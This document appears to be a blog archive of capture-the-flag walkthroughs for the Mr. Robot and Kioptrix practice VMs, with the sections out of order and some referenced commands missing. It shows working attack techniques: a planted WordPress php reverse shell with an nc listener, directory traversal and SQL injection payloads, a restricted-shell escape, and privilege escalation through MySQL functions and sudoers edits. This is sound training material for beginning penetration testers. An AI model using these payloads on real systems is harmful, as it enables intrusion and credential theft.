Looks like the victim is running Apache on ports 80/tcp and 443/tcp. Safe to assume that we will be pwning a web server. Lets do some further scanning on the victim using nikto to find any vulnerabilities on the system.

With nikto I was able to see that it was a WordPress site. I also see the /wp-login.php/, readme.html ,license.txt , and robots.txt files which look pretty interesting. Before we check these files, lets browse the web server and see what it gives us.

Well the server gives us a fancy intro and then gives us a message and a list of commands that we can run. None of them were that interesting but only the join command, where it asks for your email to “join” them. I didn’t put any email. Instead I looked into the files stated earlier. Lets check them out!

BINGO! Found the first key which turned out to be 073403c8a58a1f80d943455fb30724b9 and also a found file called fsocity.dic . Turns out to be a dictionary file. Maybe we will use this for later? For now lets save the file and continue on with the attack.

Key 1:

073403c8a58a1f80d943455fb30724b9

Well according to the readme.html file the victim is running WordPress Version 4.3.9 . I checked the liscense.txt file but found nothing of interest in there. Now lets check out /wp-login.php/ .

When viewing the page, I decided to see if there were any default username and passwords by inputting admin:admin ,but said the username was invalid. However, because of watching this show and knowing that the main character is elliot, I decided to input elliot as a username and password.

Looks like we are on to something! I got the password wrong however WordPress confirms that elliot is a username on the site. I will be doing a dictionary attack on the WordPress using the fsocity.dic which I acquired earlier. Before I do the dictionary attack, I will try make the password list smaller using the commands listed below. This will make the attack go faster when trying to acquire elliot’s password.

It worked! There are many things I can do from here like check which plugins installed are vulnerable so we can exploit them, but since elliot is the Administrator, I am going to try to upload a php file to get a reverse shell.

Note: I got the php-reverse-shell from pentestmonkey. The link to file can be located here. Also, before uploading the file, make sure to edit the ip variable and port variable. In my case my IP is 192.168.182.147 and the port I will use is 1234 .

With that done lets upload the file!

Well looks like WordPress is set up to block my php file from uploading. They probably have the wp-config.php set up this way. Its all good, I still have another trick up my sleeve. Lets edit one of the pages and put our code from the reverse-shell-php file instead. Go to Appearance -> Editor -> 404.Template. Add the code to the bottom and click update file. Should look like the picture below.

Now set up the listener to catch the reverse shell.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

We have the listener set up and ready to go. Now I am going to use curl in order to get reverse shell to run and return us a shell to our listener.

Got a shell back with the user daemon. Lets see if we can spawn a tty shell. Netsec has a good blog on helping with that. I recommend you all check him out. His blog on spawing a tty shell can be located here .
Used code below to spawn a tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

With that I snooped around and found in the /home/robot/ directory key 2 but got permission denied. I would have to be robot user (or root) to view it. However I did find a password.raw-md5 file. Maybe this might be a password to log in as robot? Lets open the file up.

Nmap is running version 3.81 which means we can run nmap in interactive mode. We can use this to execute shell commands and get a root shell. Found a useful post that is helpful called Why You Can’t Un-Root a Compromised Machine .
Check it out. It’s very helpful. Now lets get our root shell and our last key.

Conclusion

Well there you go, I got all 3 keys and root shell to our victim vm. Had fun with this one since it dealt with Mr. Robot, which is a really cool show. Recommend to anyone that is interested in watching it. That’s it for now. Till next time!

Part 5 of 5 of the kioptrix series! This a boot2root or for those that are not familiar with that term, the point of the game is to get root shell. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Now lets get started!

Description from author:

Note from VulnHub

100% works with VMware player6, workstation 10 & fusion 6.

May have issues with ViritualBox If this is the case, try this ‘fix’: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip – Step by Step screenshots for Virtualbox 4.3 & VMware Workstation 9)
About the VM

As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.

Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.

This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.

Kioptrix VM 2014 download 825Megs

MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a

SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432

Waist line 32″

p.s.: Don’t forget to read my disclaimer…

Works out of the box with VMware workstation 10, player 6, fusion 6 (Can edit the vmx file to force a downgrade for an older version – see ‘kiop2014_fix.zip’). Has been known to work with Virtualbox 4.3 or higher… First thing: try setting it to a x64 machine. Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.

The Attack

Kali Linux machine

192.168.182.147

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.155

Found that the victim has ports 80 and port 8080 open with Apache/2.2.21 running on the victim. Also as well it looks that the victim is running FreeBSD. Lets see what’s on the victim’s website.

When browsing the site, all it showed was It works! When checking the page source however, I was to find that the server is running a web app called pChart2.1.3. Looks like it has multiple vulnerabilities listed on the exploit database located here. One which we are going to do is the directory traversal. More info on the directory traversal from the OWASP site can be located here —> Path Traversal andTesting Directory traversal.

Also, what I found interesting was when I browsed the server but on port 8080, it said I was forbidden. Maybe this info might useful later on. Well for now we have enough info, lets exploit this VM.

Exploitation

We will be exploiting pChart 2.1.3 web app trying directory traversal. Inputting the URL below I will see if I can get the victim to display the /etc/passwd file. This will check if the victim is vulnerable to a directory traversal attack . If it is then I should get the info the the /etc/passwd file. Note: All I did was add ?Action=View&Script=%2f..%2f..%2fetc/passwd to the URL(after index.php). Looking at the info in the exploit database(exploit 31173) helps as well.

Looks like it is vulnerable and we got our file. There is a mysql user and an ossec user. Looks like the victim has a host intrusion detection system. Just some interesting info but lets move on to our exploitation. We need to find a way to in.

Lets see what we know. The victim is running FreeBSd and is running Apache/2.2.21 . Lets check the config files for the apache server and see what we get. Since this a FreeBSd operating system the config files for apache will be located in /usr/local/etc/apache22/httpd.conf.

Note: Just fyi for those of you wondering how I knew where exactly the apache config files were located. I didn’t. I did some online research and found a page where is showed how to set up Apache on FreeBSd, located here. This helped me find the location of the Apache config files.

The URL below is used to access the Apache config files. Lets see what we find.

Next, it prompts us with warning but don’t worry, I know what I’m doing. Click on I’ll be careful, I promise!. Once in, Right-Click and go to New and then String . Enter the preference name general.useragent.override

It will then ask to enter a string value. Make sure to put Mozilla/4.0

When all is done it should look like the picture below.

Now lets access the server on port 8080 and see what it gives us.

Looks like there is a link called phptax. Lets check it out.

Looks like phptax is some sort of tax program and it’s vulnerable – phptax 0.8 – Remote Code Execution. I also used searchsploit which also said phptax was vulnerable to a remote code execution attack.

Conclusion

Well this one took much more time then anticipated and was harder for me than it should've been but what you have to do is tough it out and "TRY HARDER"! That's it for the kioptrix series. I will work on more VMs on vulnhub in the future and might work on some write ups on the previous season of the National Cyber League since it's coming up in April. We'll see. If you guys have any ideas or enjoyed the read then leave a comment. Thanks for the read. Till next time!

Part 4 of 5 of the kioptrix series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Point of the game is to find a way to get root shell on the vulnerable machine. Link to downloading the Vm can be found here. Now lets get started!

Description from author:Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

Stays within the target audience of this site

Must be “realistic” (well kinda…)

Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.

— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**

The Attack

Kali Linux machine

192.168.182.147

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.154

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!

Since ports 139/tcp and 445/tcp are open lets enumerate SMB and check to see if there is any shares open as well as usernames using enum4linux. Much output came from using enum4linux however I only displayed the useful info below.

Found that the victim is running Samba 3.0.28a(no public exploits available) and got 5 usernames from the enumeration! It also attempted to map the shares print$ and IPC$ but it didn’t work. Lets try using dirb to scan the victims website.

So checking the website, it has a login. Lets see if it’s vulnerable to an SQL injection by putting a comma ' in the username and password fields.

Well look what we have here! It is vulnerable to SQLi!!

Exploitation

I will be using 2 ways to get 2 login credentials to the server. The first will be a manual SQL injection and the second will be using sqlmap. Both will yield the same results. Just wanted to let you all know just so you don’t get confused or anything. Lets get started!

Manual SQLi

Lets try to do an injection using one of the usernames from the SMB enumeration. I’m going to start with user john because I also found the john directory when using dirb. I will input john in the username field and 1' or '1'='1 in the password field. Now the SQL query will something like this in the back end:

SELECT * FROM users where username='john' and password='1' or '1'='1'

It worked!! Got john’s credentials with the password being MyNameIsJohn

Did the same method with robert and got his credentials as well with his password being ADGAdsafdfwt4gadfga==Note-You can skip to Escaping restricted shell to continue the pentest or go to SQLi using sqlmap to learn another method on how I got the credentials to the server.

SQLi using sqlmap

Well from output given from checking if the site was vulnerable to an SQLi and the checking the code from the login source below. It gives me enough info to perform an SQLi using sqlmap.

As I log in, I noticed that I have a limited shell with only a few commands that I am allowed to run. Since I can run the command echo, I can easily “escape” and bypass the limited shell by using the command echo os.system('/bin/bash')

Well looks like there is no password needed to access the database. What I will be attempting is since we have root access on MySQL we can execute commands(on the operating system itself) using User Defined Functions. In short, because we can access MySQL server as root, we will escalate our privileges to root using User Defined Functions. In order to perform these commands we need to make sure lib_mysqludf_sys.so is on the server. Using the whereis command I discovered that it was already installed on the server.

Using sys_exec I was able to run usermod which added john to the admin group and then ran sudo su to get the root shell.

Conclusion

This was tougher than the previous level but when it got tough, I used the university of google (google) for some additional help. Did several exploitations which in turn got me access to the server and then had to use MySQL to do privilege escalation to get our desired root shell. If you had any questions on anything or enjoyed the read, leave some feedback below! Well that’s it for this level. Now on to the last one!

Part 3 of the Kioptrix Series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Lets get started!!

Description from author:

It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.

After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

There’s a web application involved, so to have everything nice and properly displayed you really need to this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

Source: http://www.kioptrix.com/blog/?p=358

Starting the pentest

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.153

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and Reconnaissance

Running a scan with nmap I found OpenSSH 4.7p1 Debian 8ubuntu1.2 is running on port 22/tcp, and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) is running on port 80/tcp. Also, the Vm’s OS isLinux 2.6.X . I can probably guess from nmap that we will being some web exploitation.

Running Nikto, i ccould see that the web server is running phpadmin, which is a free software tool written in PHP, intended to handle the administration of MySQL over the Web (I smell an SQL injection later in the pentest).

I first went to the site and found out it was a blog. I already knew it had phpmyadmin because of the nikto scan, but I also found out it had a gallery.

After doing some browsing on the site, I found by going to “Ligoat Press Room” and by clicking on sorting options and photo id, I found that URL had a parameter of “id” which could signify a vulnerability to SQL injection. After putting ' after php?id=1 , the server gave us an SQL error. This site is vulnerable to a SQL injection!!

Exploitation

The exploitation will be separated into 3 categories. The first will be doing a SQL injection with sqlmap, the second doing a SQL injection manually, and lastly, doing the LotusCMS 3.0 eval() Remote Command Execution Exploit. All 3 will produce the same results by getting the user credentials to the vulnerable vm (which will then be used to perform privilege escalation to get root).

SQLi using sqlmap

I will NOT be putting all the output from sqlmap! I did not want to dump so much info so i just showed the commands used and the important output. Just fyi! So now knowing that the web server is vulnerable to an SQL injection, I fired up sqlmap and ran the command below to enumerate DBMS databases.

From the tables we can see that we got the username and password hashes for dreg and loneferret. We can ssh into the victim’s machine using these credentials but after we crack the hashes. (You can skip all the way to “Password Cracking using hashcat” if you want unless you want to learn the other methods I used to get the passwords)

Manual SQLi

So now I will be doing a SQL injection but manually instead of using sqlmap. I used a tutorial which greatly helped me out which I recommend to you all called Hacking website using SQL Injection -step by step guide. If you have any questions to how and why I used a certain SQL statement just go to that tutorial which explains more in detail or just leave me comment.
So with that covered, lets get started! We know from checking the site earlier, that it is vulnerable to an SQL injection so what I want to know next is how many columns are listed in the database and as well which columns are vulnerable. I will use the command listed below for to get this information. NOTE: Make sure to put this after the id parameter in the URL.

-1 union select 1,2,3,4,5,6--

From the output we can tell that it has 6 columns with column 2 and column 3 being vulnerable(if you want to know more on how I got this, click on the link stated earlier). Next, I will try to find the version of the database. Since we knew that column 2 is vulnerable, we will be injecting our code into that column. I will use command listed below to show exactly how its done!

-1 union select 1,version(),3,4,5,6--

SQL 5.0.51a is a version of MySQL. We now know what type of syntax the database uses. Now we need to find what tables are located in the database and their names. We will inject using the query listed below.

Sweet! We have all the tables on the database so lets check out dev_accounts because that one looks the most interesting. I will inject using the query listed below. Note: The CHAR() portion of the query is the name of dev_accounts. We used the tool hackbar to do the conversion so we can get the query to work.

Bingo!! We got username and password hashes to dreg and loneferret. Now onto password cracking. (You can skip the next exploit if you want to continue on in the pentest or check out the Lotus exploit to see another way of exploiting this VM)

Persistance(Linux Privilege Escalation)

Lets ssh into the victim’s VM using loneferret account.

root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
loneferret@Kioptrix3:~$

Lets check the the CompanyPolicy.README file. That looks interesting! I also ran sudo -l and whereis ht commands to see some additional info.

Found a SUID binary! So this means as our current user loneferret , we can run the ht editor as sudo and edit any file we want! Lets edit the /etc/sudoers file then! Use the commmand listed below to get into the ht text editor. Once you run the command then press F3 and then add /etc/sudoers.

loneferret@Kioptrix3:~$ sudo ht

Ok once we are in the /etc/sudoers file add /bin/sh at the end where loneferret entry is at. Then press ALT+F to save and then CTRL+Z to exit.

Conclusion

This was hard compared to the first two and took me awhile to get root access. Took some basic SQL knowledge as well as some basic linux privilege techniques to do but I got it done. If you have any feedback you want to give, give a comment below. Well it just gets harder from here. On to the next one!